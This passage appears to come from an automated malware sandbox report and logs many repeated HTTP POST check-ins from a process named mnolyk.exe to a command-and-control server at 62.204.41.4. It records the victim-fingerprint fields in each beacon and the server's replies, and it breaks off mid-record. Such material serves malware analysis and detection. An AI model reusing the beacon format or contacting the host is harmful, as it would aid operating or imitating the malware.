                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:08.512579918 CET868INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          714192.168.2.65043962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:08.690442085 CET869OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:08.754954100 CET869INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          715192.168.2.65044062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:08.934140921 CET870OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:08.998528004 CET870INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          716192.168.2.65044162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:09.174122095 CET871OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:09.238481045 CET871INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          717192.168.2.65044262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:09.409560919 CET872OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:09.472440004 CET872INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          718192.168.2.65044362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:09.644629955 CET873OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:09.708007097 CET873INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          719192.168.2.65044462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:09.894977093 CET874OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:09.958677053 CET874INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          72192.168.2.64979262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:10.777921915 CET192OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:10.841155052 CET192INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          720192.168.2.65044562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:10.137177944 CET875OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:10.205051899 CET875INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          721192.168.2.65044662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:10.384849072 CET876OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:10.448929071 CET876INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          722192.168.2.65044762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:10.628545046 CET877OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:10.692709923 CET877INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          723192.168.2.65044862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:10.888531923 CET878OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:10.952862978 CET878INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          724192.168.2.65044962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:11.130604029 CET879OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:11.196962118 CET879INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          725192.168.2.65045062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:11.381588936 CET880OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:11.444600105 CET880INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          726192.168.2.65045162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:11.626761913 CET881OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:11.690268040 CET881INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          727192.168.2.65045262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:11.861794949 CET882OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:11.924984932 CET882INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          728192.168.2.65045362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:12.107650042 CET883OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:12.172580957 CET883INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          729192.168.2.65045462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:12.348170042 CET884OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:12.415218115 CET884INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          73192.168.2.64979362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:11.030637026 CET193OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:11.095829010 CET193INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          730192.168.2.65045562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:12.584651947 CET885OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:12.648220062 CET885INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          731192.168.2.65045662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:12.818077087 CET886OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:12.879952908 CET886INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          732192.168.2.65045762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:13.065112114 CET887OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
